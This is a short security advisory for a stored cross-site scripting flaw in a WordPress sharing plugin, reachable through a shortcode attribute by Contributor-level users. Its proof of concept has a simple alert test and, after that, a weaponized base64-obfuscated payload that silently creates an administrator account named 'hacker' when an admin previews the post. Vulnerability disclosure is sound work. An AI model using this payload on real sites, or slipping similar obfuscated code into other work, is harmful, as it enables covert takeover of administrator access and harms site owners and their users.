AI Share & Summarize < 2.0.4 – Contributor+ Stored XSS via title_style Shortcode Attribute | CVE 2026-10531

Description

The plugin does not sanitise and escape some of its shortcode attributes before outputting them in a page, allowing users with the Contributor role and above to perform Stored Cross-Site Scripting attacks.

Proof of Concept

# Step 1: Log in as Contributor, create a new post with this shortcode:

[ayudawp_share_buttons title_text="Share" title_style="img src=x onerror=alert(document.domain)"]

# Step 2: Submit the post for review

# Step 3: When any user (including admin) views/previews the post,
# JavaScript executes immediately — alert(document.domain) fires.

# Admin account creation payload (fires silently when admin views the post):

[ayudawp_share_buttons title_text="x" title_style="img src=x onerror=eval(atob('dmFyIGE9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7YS5vcGVuKCJHRVQiLCIvd3AtYWRtaW4vdXNlci1uZXcucGhwIixmYWxzZSk7YS5zZW5kKCk7dmFyIG09YS5yZXNwb25zZVRleHQubWF0Y2goL25hbWU9Il93cG5vbmNlX2NyZWF0ZS11c2VyIltePl0qdmFsdWU9IihbXiJdKykiLyk7aWYoIW0pbT1hLnJlc3BvbnNlVGV4dC5tYXRjaCgvaWQ9Il93cG5vbmNlX2NyZWF0ZS11c2VyIltePl0qdmFsdWU9IihbXiJdKykiLyk7aWYobSl7dmFyIGI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7Yi5vcGVuKCJQT1NUIiwiL3dwLWFkbWluL3VzZXItbmV3LnBocCIsZmFsc2UpO2Iuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIik7Yi5zZW5kKCJfd3Bub25jZV9jcmVhdGUtdXNlcj0iK21bMV0rIiZhY3Rpb249Y3JlYXRldXNlciZ1c2VyX2xvZ2luPWhhY2tlciZlbWFpbD1oYWNrZXJAZXZpbC5jb20mcGFzczE9SGFja2VkMTIzISZwYXNzMj1IYWNrZWQxMjMhJnJvbGU9YWRtaW5pc3RyYXRvciZjcmVhdGV1c2VyPUFkZCtOZXcrVXNlciIpfQ=='))"]

# The base64 decodes to JS that:
# 1. Fetches /wp-admin/user-new.php to extract _wpnonce_create-user
# 2. POSTs to create a new administrator account (hacker / Hacked123!)
# 3. Executes silently with no visible indication